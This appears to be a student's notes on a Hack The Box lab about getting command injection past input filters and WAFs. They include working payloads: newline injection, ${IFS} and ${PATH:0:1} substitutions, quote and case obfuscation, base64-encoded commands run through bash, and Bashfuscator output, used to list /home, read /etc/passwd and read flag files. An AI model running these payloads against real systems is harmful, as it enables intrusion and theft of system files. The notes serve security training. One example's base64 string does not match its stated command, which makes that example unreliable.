Filter Evasion
Filter/WAF Detection
We can see that if we try the previous operators we tested, like (;, &&, ||), we get the error message invalid input:
If the error message displayed a different page, with information like our IP and our request, this may indicate that it was denied by a WAF.
127.0.0.1; whoamiIdentifying Blacklisted Character
We know that the (127.0.0.1) payload does work, so let us start by adding the semi-colon (127.0.0.1;):
Bypassing Space Filters and Spaces
Using Tabs
Using tabs (%09) as both Linux and Windows accept commands with tabs between arguments. So, let us try to use a tab instead of the space character (127.0.0.1%0a%09) and see if our request is accepted:
Using $IFS
Using the ($IFS) Linux Environment Variable may also work since its default value is a space and a tab. So, if we use ${IFS} where the spaces should be, the variable should be automatically replaced with a space, and our command should work.
Let us use ${IFS} and see if it works (127.0.0.1%0a${IFS}):
Using Brace Expansion
eldeim@htb[/htb]$ {ls,-la}
total 0
drwxr-xr-x 1 21y4d 21y4d 0 Jul 13 07:37 .
drwxr-xr-x 1 21y4d 21y4d 0 Jul 13 13:01 ..By using brace expansion on our command arguments, like (127.0.0.1%0a{ls,-la}). To discover more space filter bypasses, check out the PayloadsAllTheThings page on writing commands without spaces.
Bypassing Other Blacklisted Characters
Linux
Get a slash (/):
/):${PATH:0:1}The
$PATHvariable usually starts with/, e.g.,/usr/local/bin:/usr/bin:/bin.So
${PATH:0:1}extracts the first character, which is/.
Get a semi-colon (;):
;):${LS_COLORS:10:1}The
$LS_COLORSvariable often includes formatting values likedi=01;34:, and the;appears early in the string.So this substring gives you a
;.
Get a space:
${IFS}${IFS}stands for Internal Field Separator.By default, this is a space in Bash.
PoCs - Questions
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?
In this case, first we need identificate the command injection, we need try all simple and encoder characters -->
The I can see, with the character "%0a" == New Line == \n with out encode, the peticion found
Now we need go to the /home directory, we can do it out too methods
Method 1 - Path Traversal:
The with "&0a" we can put a command, for example, "ls" and it print the current directory, and we can too write anothers metods for do a path traversal, the objective is to make == "ls ../../../home" but it, block the backend. We can use operators:
echo ${IFS} == SPACE
echo ${PATH:0:1}
/ip=127.0.0.1%0als${IFS}..${PATH:0:1}..${PATH:0:1}..${PATH:0:1}homeMethod 3 - Command Ejecution
We can use a similar method with too ${PWD:0:1}
ip=127.0.0.1%0als${IFS}-la${IFS}${PWD:0:1}homeBypassing Blacklisted Commands
Commands Blacklist
A basic command blacklist filter in PHP would look like the following:
$blacklist = ['whoami', 'cat', ...SNIP...];
foreach ($blacklist as $word) {
if (strpos('$_POST['ip']', $word) !== false) {
echo "Invalid input";
}
}
Linux & Windows
if we want to obfuscate the whoami command, we can insert single quotes between its characters, as follows:
1y4d@htb[/htb]$ w'h'o'am'i
21y4d
21y4d@htb[/htb]$ w"h"o"am"i
21y4d
who$@ami
w\ho\am\iThe important things to remember are that we cannot mix types of quotes and the number of quotes must be even. We can try one of the above in our payload (127.0.0.1%0aw'h'o'am'i) and see if it works:
Windows Only
C:\htb> who^ami
21y4dPoCs - Questions
Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.
Use the begains techniques, we can found the flag.txt into the 1nj3c70r directory:
127.0.0.1%0als${IFS}-la${IFS}..${PATH:0:1}..${PATH:0:1}..${PATH:0:1}home${PATH:0:1}1nj3c70rNow, we need only read it -->
ip=127.0.0.1%0a'c''a''t'${IFS}..${PATH:0:1}..${PATH:0:1}..${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txtAdvanced Command Obfuscation
Case Manipulation
21y4d@htb[/htb]$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
21y4d
## Once we replace the spaces with tabs (%09), we see that the command works perfectly
21y4d@htb[/htb]$ $(tr%09"[A-Z]"%29"[a-z]"<<<"WhOaMi")
### Others
$(a="WhOaMi";printf %s "${a,,}")
Reversed Commands
21y4d@htb[/htb]$ $(rev<<<'imaohw')
21y4d
Encoded Commands
## First encode the command
echo -n 'cat /etc/passwd | grep 33' | base64
## End Query
bash<<<$(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologinTip: Note that we are using
<<<to avoid using a pipe|, which is a filtered character.
Evasion Tools
eldeim@htb[/htb]$ git clone https://github.com/Bashfuscator/Bashfuscator
eldeim@htb[/htb]$ cd Bashfuscator
eldeim@htb[/htb]$ pip3 install setuptools==65
eldeim@htb[/htb]$ python3 setup.py install --usereldeim@htb[/htb]$ cd ./bashfuscator/bin/
eldeim@htb[/htb]$ ./bashfuscator -h
usage: bashfuscator [-h] [-l] ...SNIP...
optional arguments:
-h, --help show this help message and exit
Program Options:
-l, --list List all the available obfuscators, compressors, and encoders
-c COMMAND, --command COMMAND
Command to obfuscate
...SNIP...We can start by simply providing the command we want to obfuscate with the -c flag:
eldeim@htb[/htb]$ ./bashfuscator -c 'cat /etc/passwd'
[+] Mutators used: Token/ForCode -> Command/Reverse
[+] Payload:
${*/+27\[X\(} ...SNIP... ${*~}
[+] Payload size: 1664 charactersPoCs - Questions
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)We need encode first the payload:
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64then, use the malicuos payload and add into spaces%09
Last updated